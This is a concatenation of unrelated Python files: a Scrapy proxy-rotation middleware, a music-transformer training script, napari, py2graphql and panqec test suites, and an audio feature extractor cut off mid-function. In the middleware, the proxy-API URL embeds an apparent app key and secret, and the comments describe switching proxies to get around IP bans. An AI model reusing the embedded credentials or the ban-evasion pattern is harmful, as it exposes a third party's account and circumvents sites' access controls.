if t - self.lasttime <= 10:
ret_proxy = self.lastip
else:
ret_proxy = self.get_proxy()
if len(ret_proxy) > 0:
self.lastip = ret_proxy
self.lasttime = t
else:
ret_proxy = self.lastip
request.meta["proxy"] = ret_proxy
print("为%s添加代理%s" %(request.url,ret_proxy), end="")
else:
# 在进行url访问之前可以进行的操作, 更换UA请求头, 使用其他代理等
pass
# 可以拦截到response响应对象(拦截下载器传递给Spider的响应对象)
def process_response(self, request, response, spider):
"""
三个参数:
# request: 响应对象所对应的请求对象
# response: 拦截到的响应对象
# spider: 爬虫文件中对应的爬虫类 WangyiSpider 的实例对象, 可以通过这个参数拿到 WangyiSpider 中的一些属性或方法
"""
# 对页面响应体数据的篡改, 如果是每个模块的 url 请求, 则处理完数据并进行封装
if spider.name in ["Hubei",'Tianjin']:
spider.browser.get(url=request.url)
# more_btn = spider.browser.find_element_by_class_name("post_addmore") # 更多按钮
# print(more_btn)
# if more_btn and request.url == "http://news.163.com/domestic/":
# more_btn.click()
# time.sleep(1) # 等待加载, 可以用显示等待来优化.
row_response= spider.browser.page_source
return HtmlResponse(url=spider.browser.current_url,body=row_response,encoding="utf8",request=request) # 参数url指当前浏览器访问的url(通过current_url方法获取), 在这里参数url也可以用request.url
# 参数body指要封装成符合HTTP协议的源数据, 后两个参数可有可无
else:
return response # 是原来的主页的响应对象
# 请求出错了的操作, 比如ip被封了,可以在这里设置ip代理
def process_exception(self, request, exception, spider):
if spider.name in ['Central','WangyiCaijing']:
print("添加代理开始")
t = time.time()
if t - self.lasttime <= 10:
ret_proxy = self.lastip
else:
ret_proxy = self.get_proxy()
if len(ret_proxy) > 0:
self.lastip = ret_proxy
self.lasttime = t
else:
ret_proxy = self.lastip
request.meta["proxy"] = ret_proxy
print("为%s添加代理%s" %(request.url,ret_proxy), end="")
return request
else:
return None
def get_proxy(self):
url = "https://api.xiaoxiangdaili.com/ip/get?appKey=611007269433659392&appSecret=TZwG0Y1s&cnt=1&method=http&releaseAuto=false&wt=json"
s = ''
resp = requests.get(url)
if resp.status_code == 200:
x = json.loads(resp.text)
s = 'http://%s:%s' %(x['data'][0]['ip'],x['data'][0]['port'])
return s
|
import os
from pathlib import Path
from tensorflow.keras.callbacks import ModelCheckpoint
from model_new import MusicTransformer
from custom.layers import *
from custom import callback
import params as par
from tensorflow.keras.optimizers import Adam
from data import DataNew
import utils
import argparse
import datetime
import sys
tf.executing_eagerly()
parser = argparse.ArgumentParser()
parser.add_argument('--l_r', default=None, help='학습률', type=float)
parser.add_argument('--batch_size', default=2, help='batch size', type=int)
parser.add_argument('--pickle_dir', default='music', help='데이터셋 경로')
parser.add_argument('--max_seq', default=2048, help='최대 길이', type=int)
parser.add_argument('--epochs', default=100, help='에폭 수', type=int)
parser.add_argument('--load_path', default=None, help='모델 로드 경로', type=str)
parser.add_argument('--save_path', default="result/dec0722", help='모델 저장 경로')
parser.add_argument('--is_reuse', default=False)
parser.add_argument('--multi_gpu', default=True)
parser.add_argument('--num_layers', default=1, type=int)
args = parser.parse_args()
# set arguments
l_r = args.l_r
batch_size = args.batch_size
pickle_dir = args.pickle_dir
max_seq = args.max_seq
epochs = args.epochs
is_reuse = args.is_reuse
load_path = args.load_path
save_path = args.save_path
multi_gpu = args.multi_gpu
num_layer = args.num_layers
def get_current_datetime():
from datetime import datetime
now = datetime.now()
dt_name = now.strftime("%m_%d_%Y__%H_%M_%S")
return dt_name
# if IS_ON_GOOGLE_COLAB:
# FOLDER_ROOT = "/content/drive/MyDrive/magisterka/SheetMusicGenerator2"
# else:
# FOLDER_ROOT = "."
TEST_RUN = True
NORMALIZE_NOTES = True
USE_COMPUTED_VALUES = True
USE_SAVE_POINT = False
NORMALIZATION_BOUNDARIES = [3, 4]
EPOCHS = 250
LATENT_VECTOR_DIM = 2
BATCH_SIZE = 256
SEQUENCE_LENGTH = 32
FOLDER_ROOT = "."
# COMPUTED_INT_TO_NOTE_PATH = "/content/drive/MyDrive/magisterka/SheetMusicGenerator2/AUTOENCODER/data/dicts/int_to_note_08_19_2021__17_25_44"
# COMPUTED_INT_TO_DURATION_PATH = "/content/drive/MyDrive/magisterka/SheetMusicGenerator2/AUTOENCODER/data/dicts/int_to_duration_08_19_2021__17_25_44"
# COMPUTED_NOTES_PATH = "/content/drive/MyDrive/magisterka/SheetMusicGenerator2/AUTOENCODER/data/notes/notes_08_19_2021__17_25_44"
# COMPUTED_DURATIONS_PATH = "/content/drive/MyDrive/magisterka/SheetMusicGenerator2/AUTOENCODER/data/durations/durations_08_19_2021__17_25_44"
COMPUTED_DATA_PATH = "AUTOENCODER/data/data_file_12_06_2021__19_53_42"
SAVE_POINT = "AUTOENCODER/checkpoints/08_19_2021__18_34_10/epoch=014-loss=383.5284-acc=0.0000.hdf5"
AUTOENCODER = "TRANSFORMER"
MODEL_NAME = AUTOENCODER
MODEL_FOLDER_ROOT = os.path.join(FOLDER_ROOT, MODEL_NAME)
CURR_DT = get_current_datetime()
MODEL_DIR_PATH = os.path.join(MODEL_FOLDER_ROOT, "generated_models")
OCCURENCES = os.path.join(MODEL_FOLDER_ROOT, "data", "occurences")
DATA_DIR = os.path.join(MODEL_FOLDER_ROOT, "data")
DATA_NOTES_DIR = os.path.join(DATA_DIR, "notes")
DATA_DURATIONS_DIR = os.path.join(DATA_DIR, "durations")
DATA_FILE_PATH = os.path.join(DATA_DIR, "data_file_" + str(CURR_DT))
DATA_DICTS_DIR = os.path.join(DATA_DIR, "dicts")
DATA_INT_TO_NOTE_PATH = os.path.join(DATA_DICTS_DIR, "int_to_note_" + str(CURR_DT))
DATA_INT_TO_DURATION_PATH = os.path.join(DATA_DICTS_DIR, "int_to_duration_" + str(CURR_DT))
DATA_NOTES_PATH = os.path.join(DATA_NOTES_DIR, "notes_" + str(CURR_DT))
DATA_DURATIONS_PATH = os.path.join(DATA_DURATIONS_DIR, "durations_" + str(CURR_DT))
# MIDI_SONGS_DIR = os.path.join(FOLDER_ROOT, "midi_songs")
MIDI_SONGS_DIR = os.path.join(FOLDER_ROOT, "midi_songs_smaller")
# MIDI_SONGS_DIR = os.path.join(FOLDER_ROOT, "midi_songs_medium")
MIDI_GENERATED_DIR = os.path.join(MODEL_FOLDER_ROOT, "midi_generated")
MIDI_SONGS_REGEX = os.path.join(MIDI_SONGS_DIR, "*.mid")
CHECKPOINTS_DIR = os.path.join(MODEL_FOLDER_ROOT, "checkpoints")
CHECKPOINT = os.path.join(CHECKPOINTS_DIR, str(CURR_DT))
LOGS_DIR = os.path.join(MODEL_FOLDER_ROOT, "logs")
LOG = os.path.join(LOGS_DIR, str(CURR_DT))
all_paths = [MODEL_DIR_PATH, OCCURENCES, DATA_NOTES_DIR, DATA_DURATIONS_DIR, DATA_DICTS_DIR,
MIDI_GENERATED_DIR, CHECKPOINTS_DIR, CHECKPOINT, LOGS_DIR, LOG]
for path in all_paths:
Path(path).mkdir(parents=True, exist_ok=True)
# load data
dataset = DataNew('midi_processed', max_seq, batch_size)
# print(dataset)
# load model
curr_dt = get_current_datetime()
learning_rate = callback.CustomSchedule(par.embedding_dim) if l_r is None else l_r
opt = Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)
filepath = CHECKPOINT + str(curr_dt) + "/" + "epoch:{epoch:02d}-loss:{loss:.4f}" #-acc:{binary_accuracy:.4f}.hdf5"
checkpoint = ModelCheckpoint(
filepath,
monitor='loss',
verbose=0,
save_best_only=True,
mode='max'
)
#
# checkpoint = ModelCheckpoint(
# filepath,
# monitor='binary_accuracy',
# verbose=0,
# save_best_only=True,
# mode='max'
# )
log = tf.keras.callbacks.TensorBoard(log_dir=LOG + curr_dt),
callbacks_list = [checkpoint, log]
# define model
mt = MusicTransformer(
embedding_dim=256,
vocab_size=par.vocab_size,
num_layer=num_layer,
max_seq=max_seq,
dropout=0.2,
debug=False, loader_path=load_path)
mt.compile(optimizer=opt, loss=callback.transformer_dist_train_loss)
mt.run_eagerly = True
# batch = (dataset.generators_dict["train"][0])
# print(type(dataset.generators_dict["train"]))
# mt.train_on_batch(batch[0], batch[1])
# print(len(dataset.generators_dict["train"][0]))
# print(len(dataset.generators_dict["train"][1]))
# print(len(dataset.generators_dict["train"][2]))
# ds = tf.data.Dataset.from_generator(dataset.generators_dict["train"].__iter__(), output_types=tf.float32)
mt.fit(x=dataset.generators_dict["train"][0], y=dataset.generators_dict["train"][1], epochs=EPOCHS, callbacks=callbacks_list)
# mt.fit(dataset.generators_dict["train"], epochs=EPOCHS, callbacks=callbacks_list)
# mt.fit(dataset.generators_dict["train"], epochs=EPOCHS, callbacks=callbacks_list)
# define tensorboard writer
current_time = datetime.datetime.now().strftime('%Y%m%d-%H%M%S')
train_log_dir = 'logs/mt_decoder/'+current_time+'/train'
eval_log_dir = 'logs/mt_decoder/'+current_time+'/eval'
train_summary_writer = tf.summary.create_file_writer(train_log_dir)
eval_summary_writer = tf.summary.create_file_writer(eval_log_dir)
EPOCHS=2
|
import numpy as np
import pytest
from napari.utils.colormaps import Colormap
def test_linear_colormap():
"""Test a linear colormap."""
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
cmap = Colormap(colors, name='testing')
assert cmap.name == 'testing'
assert cmap.interpolation == 'linear'
assert len(cmap.controls) == len(colors)
np.testing.assert_almost_equal(cmap.colors, colors)
np.testing.assert_almost_equal(cmap.map([0.75]), [[0, 0.5, 0.5, 1]])
def test_linear_colormap_with_control_points():
"""Test a linear colormap with control points."""
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
cmap = Colormap(colors, name='testing', controls=[0, 0.75, 1])
assert cmap.name == 'testing'
assert cmap.interpolation == 'linear'
assert len(cmap.controls) == len(colors)
np.testing.assert_almost_equal(cmap.colors, colors)
np.testing.assert_almost_equal(cmap.map([0.75]), [[0, 1, 0, 1]])
def test_non_ascending_control_points():
"""Test non ascending control points raises an error."""
colors = np.array(
[[0, 0, 0, 1], [0, 0.5, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
)
with pytest.raises(ValueError):
Colormap(colors, name='testing', controls=[0, 0.75, 0.25, 1])
def test_wrong_number_control_points():
"""Test wrong number of control points raises an error."""
colors = np.array(
[[0, 0, 0, 1], [0, 0.5, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
)
with pytest.raises(ValueError):
Colormap(colors, name='testing', controls=[0, 0.75, 1])
def test_wrong_start_control_point():
"""Test wrong start of control points raises an error."""
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
with pytest.raises(ValueError):
Colormap(colors, name='testing', controls=[0.1, 0.75, 1])
def test_wrong_end_control_point():
"""Test wrong end of control points raises an error."""
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
with pytest.raises(ValueError):
Colormap(colors, name='testing', controls=[0, 0.75, 0.9])
def test_binned_colormap():
"""Test a binned colormap."""
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
cmap = Colormap(colors, name='testing', interpolation='zero')
assert cmap.name == 'testing'
assert cmap.interpolation == 'zero'
assert len(cmap.controls) == len(colors) + 1
np.testing.assert_almost_equal(cmap.colors, colors)
np.testing.assert_almost_equal(cmap.map([0.4]), [[0, 1, 0, 1]])
def test_binned_colormap_with_control_points():
"""Test a binned with control points."""
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
cmap = Colormap(
colors,
name='testing',
interpolation='zero',
controls=[0, 0.2, 0.3, 1],
)
assert cmap.name == 'testing'
assert cmap.interpolation == 'zero'
assert len(cmap.controls) == len(colors) + 1
np.testing.assert_almost_equal(cmap.colors, colors)
np.testing.assert_almost_equal(cmap.map([0.4]), [[0, 0, 1, 1]])
def test_colormap_equality():
colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
cmap_1 = Colormap(colors, name='testing', controls=[0, 0.75, 1])
cmap_2 = Colormap(colors, name='testing', controls=[0, 0.75, 1])
cmap_3 = Colormap(colors, name='testing', controls=[0, 0.25, 1])
assert cmap_1 == cmap_2
assert cmap_1 != cmap_3
|
import asyncio
import json
import unittest
from string import printable
from asynctest import CoroutineMock, patch
from graphql import parse
from hypothesis import given, strategies as st
import mock
from py2graphql import (
Aliased,
Client,
GraphQLEndpointError,
GraphQLError,
InfinityNotSupportedError,
Literal,
Query,
UnserializableTypeError,
ValuesRequiresArgumentsError,
)
from py2graphql.middleware import AddictMiddleware, AutoSubscriptingMiddleware
class Py2GraphqlTests(unittest.TestCase):
def test_simple(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", name="rome")
.values("title", "url")
.to_graphql(),
'query {\n repository(owner: "juliuscaeser", name: "rome") {\n title\n url\n }\n}',
)
def test_boolean(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=True)
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: true) {title url}}',
)
def test_none(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=None)
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: null) {title url}}',
)
def test_literal(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", orderBy=Literal("age_ASC"))
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", orderBy: age_ASC) {title url}}',
)
def test_number(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=10)
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: 10) {title url}}',
)
def test_float(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=10.0)
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: 10.0) {title url}}',
)
def test_list(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=[])
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: []) {title url}}',
)
def test_dict(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test={"a": 1})
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: {a: 1}) {title url}}',
)
def test_function(self):
try:
Query().repository(owner="juliuscaeser", test=lambda: "").values(
"title", "url"
).to_graphql(indentation=0)
except UnserializableTypeError:
pass
else:
raise Exception
def test_list_with_contents(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=[1])
.values("title", "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: [1]) {title url}}',
)
def test_mutation_boolean(self):
self.assertEqual(
Query(operation_type="mutation")
.repository(owner="juliuscaeser", isAdmin=True)
.values("title", "url")
.to_graphql(indentation=0),
'mutation {repository(owner: "juliuscaeser", isAdmin: true) {title url}}',
)
def test_alias(self):
self.assertEqual(
Query()
.repository(owner="juliuscaeser", test=True)
.values(Aliased("title", "xxx"), "url")
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", test: true) {xxx: title url}}',
)
def test_empty_values(self):
try:
self.assertEqual(
Query()
.repository(owner="juliuscaeser", isAdmin=True)
.values()
.to_graphql(indentation=0),
'query {repository(owner: "juliuscaeser", isAdmin: true) {title url}}',
)
except ValuesRequiresArgumentsError:
pass
else:
assert False
def test_subscripting_query_fetches(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 200
r.content = json.dumps(
{"data": {"repository": {"title": "xxx", "url": "example.com"}}}
)
return r
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
self.assertEqual(
Query(
client=Client(
"http://example.com", {}, middleware=[AddictMiddleware]
)
)
.repository(owner="juliuscaeser", test=10)
.values("title", "url")["repository"],
{"title": "xxx", "url": "example.com"},
)
def test_fetch_async(self):
async def task():
with patch("aiohttp.ClientSession.post") as mocked:
mocked.return_value.__aenter__.return_value.status = 200
mocked.return_value.__aenter__.return_value.text = CoroutineMock(
return_value=json.dumps(
{"data": {"repository": {"title": "xxx", "url": "example.com"}}}
)
)
result = (
await Query(client=Client("http://example.com", {}))
.repository(owner="juliuscaeser", test=10)
.values("title", "url")
.fetch_async()
)
self.assertEqual(
result, {"repository": {"title": "xxx", "url": "example.com"}}
)
loop = asyncio.new_event_loop()
loop.run_until_complete(task())
loop.close()
def test_fetch_async_retry(self):
async def task():
class ReturnValue:
pass
with patch("aiohttp.ClientSession.post") as mocked:
ret = ReturnValue
ret.status = 200
ret.text = CoroutineMock(
return_value=json.dumps(
{"data": {"repository": {"title": "xxx", "url": "example.com"}}}
)
)
mocked.return_value.__aenter__.side_effect = [Exception(), ret]
result = (
await Query(client=Client("http://example.com", {}))
.repository(owner="juliuscaeser", test=10)
.values("title", "url")
.fetch_async()
)
self.assertEqual(
result, {"repository": {"title": "xxx", "url": "example.com"}}
)
loop = asyncio.new_event_loop()
loop.run_until_complete(task())
loop.close()
def test_auto_subscript(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 200
r.content = json.dumps(
{"data": {"repository": {"title": "xxx", "url": "example.com"}}}
)
return r
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
self.assertEqual(
Query(
client=Client(
"http://example.com",
{},
middleware=[AutoSubscriptingMiddleware],
)
)
.repository(owner="juliuscaeser", test=10)
.values("title", "url")
.fetch(),
{"title": "xxx", "url": "example.com"},
)
def test_auto_subscript_iteration(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 200
r.content = json.dumps(
{"data": {"repos": [{"title": "xxx", "url": "example.com"}]}}
)
return r
client = Client(
"http://example.com", {}, middleware=[AutoSubscriptingMiddleware]
)
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
for x in (
Query(client=client)
.repos(owner="juliuscaeser", test=10)
.values("title", "url")
):
self.assertEqual(x["title"], "xxx")
def test_iteration(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 200
r.content = json.dumps(
{"data": {"repos": [{"title": "xxx", "url": "example.com"}]}}
)
return r
client = Client("http://example.com", {})
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
for x in (
Query(client=client)
.repos(owner="juliuscaeser", test=10)
.values("title", "url")["repos"]
):
self.assertEqual(x["title"], "xxx")
def test_syntax_error_response(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 200
r.content = json.dumps(
{
"errors": [
{
"message": 'Syntax Error GraphQL (2:18) Unexpected Name "null"\n',
"locations": [{"line": 2, "column": 18}],
}
]
}
)
return r
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
try:
Query(client=Client("http://example.com", {})).repository(
owner=None, test=10
).values("title", "url").fetch()
except GraphQLError as e:
self.assertEqual(
e.response,
{
"errors": [
{
"locations": [{"column": 18, "line": 2}],
"message": 'Syntax Error GraphQL (2:18) Unexpected Name "null"\n',
}
]
},
)
else:
assert False
def test_raise_exceptions(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 400
r.content = json.dumps({"errors": {"repository": "xxx"}})
return r
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
try:
Query(client=Client("http://example.com", {})).repository(
owner="juliuscaeser", test=10
).values("title", "url")["repository"]
except GraphQLEndpointError as e:
self.assertEqual(e.response, '{"errors": {"repository": "xxx"}}')
else:
assert False
def test_raise_endpoint_exceptions(self):
class FakeResponse:
pass
def fake_request(url, body, headers, **kwargs):
r = FakeResponse()
r.status_code = 400
r.content = "blahblah"
return r
http_mock = mock.Mock(side_effect=fake_request)
with mock.patch("requests.post", http_mock):
try:
Query(client=Client("http://example.com", {})).repository(
owner="juliuscaeser", test=10
).values("title", "url")["repository"]
except GraphQLEndpointError as e:
self.assertEqual(e.response, "blahblah")
self.assertEqual(e.status_code, 400)
else:
assert False
@given(st.fixed_dictionaries({"xxx": st.text(printable)}))
def test_fuzz(self, data):
query = (
Query(client=Client("http://example.com", {}))
.repository(**data)
.values("id")
)
parse(str(query))
@given(st.fixed_dictionaries({"xxx": st.floats(allow_infinity=True)}))
def test_fuzz_floats(self, data):
query = (
Query(client=Client("http://example.com", {}))
.repository(**data)
.values("id")
)
try:
parse(str(query))
except InfinityNotSupportedError:
pass
@given(st.fixed_dictionaries({"xxx": st.integers()}))
def test_fuzz_integers(self, data):
query = (
Query(client=Client("http://example.com", {}))
.repository(**data)
.values("id")
)
parse(str(query))
@given(st.fixed_dictionaries({"xxx": st.lists(st.text(printable))}))
def test_fuzz_lists(self, data):
query = (
Query(client=Client("http://example.com", {}))
.repository(**data)
.values("id")
)
parse(str(query))
if __name__ == "__main__":
unittest.main()
|
import itertools
import pytest
import numpy as np
from panqec.bpauli import bcommute, bsf_wt
from panqec.codes import Toric3DCode
from panqec.decoders import Toric3DMatchingDecoder
from panqec.error_models import PauliErrorModel
class TestToric3DMatchingDecoder:
@pytest.fixture
def code(self):
return Toric3DCode(3, 4, 5)
@pytest.fixture
def decoder(self, code):
error_model = PauliErrorModel(1/3, 1/3, 1/3)
error_rate = 0.1
return Toric3DMatchingDecoder(code, error_model, error_rate)
def test_decoder_has_required_attributes(self, decoder):
assert decoder.label is not None
assert decoder.decode is not None
def test_decode_trivial_syndrome(self, decoder, code):
syndrome = np.zeros(
shape=code.stabilizer_matrix.shape[0], dtype=np.uint
)
correction = decoder.decode(syndrome)
assert correction.shape[0] == 2*code.n
assert np.all(bcommute(code.stabilizer_matrix, correction) == 0)
assert issubclass(correction.dtype.type, np.integer)
def test_decode_X_error(self, decoder, code):
error = code.to_bsf({
(2, 1, 2): 'X',
})
assert bsf_wt(error) == 1
# Measure the syndrome and ensure non-triviality.
syndrome = code.measure_syndrome(error)
assert np.any(syndrome != 0)
correction = decoder.decode(syndrome)
total_error = (error + correction) % 2
assert np.all(bcommute(code.stabilizer_matrix, total_error) == 0)
def test_decode_many_X_errors(self, decoder, code):
error = code.to_bsf({
(1, 0, 0): 'X',
(0, 1, 0): 'X',
(0, 0, 3): 'X',
})
assert bsf_wt(error) == 3
syndrome = code.measure_syndrome(error)
assert np.any(syndrome != 0)
correction = decoder.decode(syndrome)
total_error = (error + correction) % 2
assert np.all(bcommute(code.stabilizer_matrix, total_error) == 0)
def test_unable_to_decode_Z_error(self, decoder, code):
error = code.to_bsf({
(1, 0, 2): 'Z'
})
assert bsf_wt(error) == 1
syndrome = code.measure_syndrome(error)
assert np.any(syndrome != 0)
correction = decoder.decode(syndrome)
assert np.all(correction == 0)
total_error = (error + correction) % 2
assert np.all(error == total_error)
assert np.any(bcommute(code.stabilizer_matrix, total_error) != 0)
def test_decode_many_codes_and_errors_with_same_decoder(self):
codes = [
Toric3DCode(3, 4, 5),
Toric3DCode(3, 3, 3),
Toric3DCode(5, 4, 3),
]
sites = [
(0, 0, 1),
(1, 0, 0),
(0, 1, 0)
]
error_model = PauliErrorModel(1/3, 1/3, 1/3)
error_rate = 0.1
for code, site in itertools.product(codes, sites):
decoder = Toric3DMatchingDecoder(code, error_model, error_rate)
error = code.to_bsf({
site: 'X',
})
syndrome = code.measure_syndrome(error)
correction = decoder.decode(syndrome)
total_error = (error + correction) % 2
assert np.all(bcommute(code.stabilizer_matrix, total_error) == 0)
|
import os
import traceback
import namedtupled
from functools import partial
from itertools import chain
import numpy as np
from scipy import stats
from sklearn.externals import joblib
from sklearn.preprocessing import LabelEncoder
import librosa
import h5py
from model.preproc.model import MelSpectrogramGPU
from model.model import Model
from utils.misc import get_layer, load_config
import fire
import tqdm
DATASET_INFO = {
'GTZAN': {
'info': '/mnt/bulk2/datasets/GTZAN/GTZAN.dataset.info',
'type': 'classification'
},
'Ballroom': {
'info': '/mnt/bulk2/datasets/Ballroom/Ballroom.dataset.info',
'type': 'classification'
},
# 'BallroomExt': {
# 'info': '/mnt/bulk2/datasets/BallroomExt/BallroomExt.dataset.info',
# 'type': 'classification'
# },
# 'FMA': {
# 'info': '/mnt/bulk2/datasets/FMA/FMA_MEDIUM.dataset.info',
# 'type': 'classification'
# },
'FMA_SUB': {
'info': '/mnt/bulk2/datasets/FMA/FMA_MEDIUM_SUB.dataset.info',
'type': 'classification'
},
'EmoValStatic': {
'info': '/mnt/bulk2/datasets/MusicEmotion/MusicEmotionStaticValence.dataset.info',
'type': 'regression'
},
'EmoAroStatic': {
'info': '/mnt/bulk2/datasets/MusicEmotion/MusicEmotionStaticArousal.dataset.info',
'type': 'regression'
},
'IRMAS_SUB': {
'info': '/mnt/bulk2/datasets/IRMAS/IRMAS_SUB.dataset.info',
'type': 'classification'
},
'ThisIsMyJam': {
'info': '/mnt/bulk2/datasets/JamDataset/ThisIsMyJam.dataset.info',
'type': 'recommendation'
}
}
class BaseExtractor(object):
""""""
def __init__(self, task, out_dir=None, hop_sz=1.,
prob=False, *args, **kwargs):
""""""
if task not in DATASET_INFO:
raise ValueError(
'[ERROR] {} is not supported!'.format(task))
self.task = task
self.task_type = DATASET_INFO[self.task]['type']
self.hop_sz = hop_sz # in second
self.prob = prob # probability output
if out_dir is None:
self.root = os.getcwd()
else:
if os.path.exists(out_dir):
self.root = out_dir
else:
raise ValueError(
'[ERROR] {} is not existing!'.format(self.root))
# load db information data
self.db_info = map(
lambda r: (r[0], r[1], r[2].split(',')),
map(lambda l: l.replace('\n', '').split('\t'),
open(DATASET_INFO[task]['info'], 'r').readlines())
)
# task-specific symbolic target dimension
if self.task_type != 'recommendation':
l = 1
else:
l = max(list(chain.from_iterable(
map(lambda r: [int(d) for d in r[2]], self.db_info))))
l += 1
self.label_dim = l
def post_init(self):
""""""
# setup label dataset
if self.task_type == 'classification':
label_set = map(lambda x: x[-1], self.db_info)
self.label_encoder = LabelEncoder()
self.label_encoder.fit(np.array(label_set).ravel())
self.hf.create_dataset(
'labels',
data=np.array(self.label_encoder.classes_, dtype='S')
)
self.hf.attrs['dataset'] = self.task
self.hf.attrs['type'] = DATASET_INFO[self.task]['type']
def _prepare_db(self):
""""""
raise NotImplementedError
def _extract_feature(self, fn):
""""""
raise NotImplementedError
def _extract_label(self, label):
""""""
if self.task_type == 'classification':
return self.label_encoder.transform(np.array(label).ravel())[0]
elif self.task_type == 'regression':
return float(label[0])
elif self.task_type == 'recommendation':
y = np.zeros((self.label_dim,))
y[[int(d) for d in label]] = 1
return y
def _save_X(self, ix, fn):
""""""
raise NotImplementedError
def _save_y(self, ix, label):
""""""
self.hf['y'][ix] = self._extract_label(label)
def process(self):
""""""
for (ix, fn, label) in tqdm.tqdm(self.db_info, ncols=80):
ix = int(ix)
self._save_X(ix, fn)
self._save_y(ix, label)
class MTLExtractor(BaseExtractor):
""""""
def __init__(self, model_fn, task, out_dir=None, hop_sz=1.):
""""""
super(MTLExtractor, self).__init__(task, out_dir, hop_sz, prob=True)
# load configuration for model
if os.path.exists(model_fn):
model_id = os.path.splitext(os.path.basename(model_fn))[0]
self.model_id = model_id.split('_state')[0]
model_state = joblib.load(model_fn)
self.config = namedtupled.map(model_state['config'])
else:
self.model_id = 'rnd'
# load default config and change task as rand
self.config = load_config('config/config.example.json')
self.config.target[0] = 'rand'
self.out_fn = os.path.join(
self.root, self.model_id + '_{}_feature.h5'.format(self.task))
self.targets = self.config.target
# load model
self.model = Model(self.config)
# variable set up
self.sr = self.config.hyper_parameters.sample_rate
self.length = self.config.hyper_parameters.patch_length
self.n_fft = self.config.hyper_parameters.n_fft
self.hop_sz_trn = self.config.hyper_parameters.hop_size
self.input = self.config.hyper_parameters.input
self.hop = int(self.hop_sz * self.sr)
sig_len = int(self.sr * self.length)
self.sig_len = sig_len - sig_len % self.hop_sz_trn
# prepare preprocessor if needed
if self.config.hyper_parameters.input == 'melspec':
self.melspec = MelSpectrogramGPU(
2, self.sr, self.n_fft, self.hop_sz_trn)
# set feature layer names
branch_at = self.config.hyper_parameters.branch_at
if isinstance(branch_at, (int, float)):
self.feature_layers = [
'{}.fc'.format(t)
for t in self.targets
]
elif isinstance(branch_at, (str, unicode)) and branch_at == "fc":
self.feature_layers = ['fc']
self._prepare_db()
super(MTLExtractor, self).post_init()
self.hf.attrs['targets'] = [t.encode() for t in self.targets]
def _prepare_db(self):
""" prepare task specific db setting """
n = len(self.db_info) # num obs
# currently, we use same dim for all multi targets
m = get_layer(
self.model.net,
self.feature_layers[0]).output_shape[-1] # feature dim
o = self.config.hyper_parameters.n_out # model output dim
self.hf = h5py.File(self.out_fn, 'w')
self.hf.create_dataset('y', shape=(n, self.label_dim))
self.hf.create_group('X')
# 'FC' branch case, only one dataset needed
if self.feature_layers[0] == 'fc':
self.hf['X'].create_dataset('fc', shape=(n, m * 2))
# otherwise, dataset needed per each task
else:
for target, n_out in zip(self.targets, o):
# mean / std
self.hf['X'].create_dataset(target, shape=(n, m * 2))
if self.prob:
self.hf.create_group('Z')
for target, n_out in zip(self.targets, o):
if target == 'self':
continue
self.hf['Z'].create_dataset(target, shape=(n, n_out))
def _extract_feature(self, fn):
""""""
# load audio
y, _ = librosa.load(fn, sr=self.sr, res_type='kaiser_fast')
if y.ndim < 2:
y = np.repeat(y[None, :], 2, axis=0)
end = y.shape[1]
X = []
feature = {target: None for target in self.targets}
mean_prob = {target: [] for target in self.targets}
for j in xrange(0, end, self.hop):
slc = slice(j, j + self.sig_len)
x_chunk = y[:, slc][None, :, :]
if x_chunk.shape[2] < self.sig_len:
continue
if self.config.hyper_parameters.input == 'melspec':
x_chunk = self.melspec.process(x_chunk)
X.append(x_chunk)
x = np.concatenate(X, axis=0)
# 'FC' branching case, all feature are same
